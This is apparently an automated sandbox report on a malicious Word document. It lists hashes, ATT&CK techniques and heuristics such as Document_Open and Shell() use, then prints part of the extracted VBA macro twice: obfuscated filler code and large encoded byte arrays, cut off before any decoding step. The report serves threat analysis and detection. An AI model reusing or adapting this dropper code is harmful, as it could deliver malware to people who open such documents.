Office (OLE) malware analysis — malicious · d7bb3b0d7b9ee2e0

MALICIOUS

Office (OLE)

309.5 KB Created: 2015-12-16 14:32:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: e1608367856ad6e52aa0b842330a9f6e SHA-1: bea27b6619f9223af2a0bb8c4950ea14a99cfecf SHA-256: d7bb3b0d7b9ee2e0d7ae7ff2b9aa73b6563186739daf27910fdc74f850965318

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates the document is designed to execute arbitrary commands, likely to download and execute a secondary payload. The presence of the Shell() call and the auto-execution of the Document_Open macro strongly suggest a malicious intent for initial execution.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45572 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45572 bytes
SHA-256: `074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long #Else Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long #End If Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant Sub LHJwPn() NrSyi8bt999vkR = 71 If Abs(6) = 57 Then OzAJDIA = 7498 Load QHW95ygCCXLKMlehi DateSerial 52, 90, 50 DeleteSetting "Qp4Y8D4vz89Olb" Randomize DyCTQ9UKs03HGVdP = EOF(96) If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80 DWcjwawOjsm = CVErr(31) Hour 53 AppActivate 41 HDM9913zDtS = 60 End Sub Function zKK(U6jMo As Integer) As Boolean PdKLCGN = 61 Static HFBwwFtzVi0lGw38q As Byte G7UUZ5FN3z = 78 HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1 OuWaqUF1z = 48 If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59) AeIBD = 73 zKK = HFBwwFtzVi0lGw38q = 0 Q9dlGz5OfQm = 70 HFBwwFtzVi0lGw38q = 0 QPM3j8cFUa0L = 81 End Function Sub OJwHPvvkNBx() WBJkej = 47 On Error Resume Next B0K8bUdQ = 54 A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237) VpGcg5LX = 51 A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11 ... (truncated)

SHA-256: 074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long
#Else
Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long
#End If
Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer
Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant
Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant
Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant
Sub LHJwPn()
NrSyi8bt999vkR = 71
If Abs(6) = 57 Then OzAJDIA = 7498
Load QHW95ygCCXLKMlehi
DateSerial 52, 90, 50
DeleteSetting "Qp4Y8D4vz89Olb"
Randomize
DyCTQ9UKs03HGVdP = EOF(96)
If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80
DWcjwawOjsm = CVErr(31)
Hour 53
AppActivate 41
HDM9913zDtS = 60
End Sub
Function zKK(U6jMo As Integer) As Boolean
PdKLCGN = 61
Static HFBwwFtzVi0lGw38q As Byte
G7UUZ5FN3z = 78
HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1
OuWaqUF1z = 48
If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59)
AeIBD = 73
zKK = HFBwwFtzVi0lGw38q = 0
Q9dlGz5OfQm = 70
HFBwwFtzVi0lGw38q = 0
QPM3j8cFUa0L = 81
End Function
Sub OJwHPvvkNBx()
WBJkej = 47
On Error Resume Next
B0K8bUdQ = 54
A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237)
VpGcg5LX = 51
A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.